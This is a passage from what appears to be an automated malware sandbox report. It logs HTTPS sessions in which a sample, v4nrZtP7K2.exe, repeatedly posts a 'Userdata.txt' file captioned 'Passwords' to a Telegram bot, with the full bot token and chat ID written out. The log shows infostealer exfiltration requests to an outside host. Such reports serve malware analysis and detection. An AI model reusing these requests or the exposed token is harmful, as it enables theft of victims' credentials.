                                                                                    2025-01-10 20:42:04 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 65 36 64 34 30 37 64 61 33 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: --===============8dd33e6d407da33Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                    2025-01-10 20:42:05 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Fri, 10 Jan 2025 20:42:05 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 534
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-10 20:42:05 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 39 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 37 32 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":44695,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541725,"document":{"file_name":"U


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    28192.168.2.950030149.154.167.2204434256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-10 20:42:07 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary================8dd3413d20af3d8
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 1090
                                                                                    2025-01-10 20:42:07 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 31 33 64 32 30 61 66 33 64 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: --===============8dd3413d20af3d8Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                    2025-01-10 20:42:07 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Fri, 10 Jan 2025 20:42:07 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 534
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-10 20:42:07 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 39 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 37 32 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":44696,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541727,"document":{"file_name":"U


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    29192.168.2.950032149.154.167.2204434256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-10 20:42:09 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary================8dd3445bcd1a54a
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 1090
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-10 20:42:09 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 34 35 62 63 64 31 61 35 34 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: --===============8dd3445bcd1a54aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                    2025-01-10 20:42:09 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Fri, 10 Jan 2025 20:42:09 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 534
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-10 20:42:09 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 39 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 37 32 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":44697,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541729,"document":{"file_name":"U


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    30192.168.2.950034149.154.167.2204434256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-10 20:42:11 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary================8dd346fcd3daf9c
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 1090
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-10 20:42:11 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 36 66 63 64 33 64 61 66 39 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: --===============8dd346fcd3daf9cContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                    2025-01-10 20:42:11 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Fri, 10 Jan 2025 20:42:11 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 534
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-10 20:42:11 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 39 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 37 33 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":44698,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541731,"document":{"file_name":"U


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    31192.168.2.950036149.154.167.2204434256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-10 20:42:13 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary================8dd34acc0f4c217
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 1090
                                                                                    2025-01-10 20:42:13 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 61 63 63 30 66 34 63 32 31 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: --===============8dd34acc0f4c217Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                    2025-01-10 20:42:13 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Fri, 10 Jan 2025 20:42:13 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 534
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-10 20:42:13 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 39 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 37 33 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":44699,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541733,"document":{"file_name":"U


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    32192.168.2.950038149.154.167.2204434256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-10 20:42:15 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary================8dd34da4da4320d
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 1090
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-10 20:42:15 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 64 61 34 64 61 34 33 32 30 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: --===============8dd34da4da4320dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                    2025-01-10 20:42:15 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Fri, 10 Jan 2025 20:42:15 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 534
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-10 20:42:15 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 30 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 37 33 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":44700,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541735,"document":{"file_name":"U


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    33192.168.2.950040149.154.167.2204434256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-10 20:42:17 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary================8dd351bdfb947d2
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 1090
                                                                                    2025-01-10 20:42:17 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 31 62 64 66 62 39 34 37 64 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: --===============8dd351bdfb947d2Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                    2025-01-10 20:42:17 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Fri, 10 Jan 2025 20:42:17 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 534
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-10 20:42:17 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 30 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 37 33 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":44701,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541737,"document":{"file_name":"U


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    34192.168.2.950042149.154.167.2204434256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-10 20:42:20 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary================8dd358ba0a45b44
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 1090
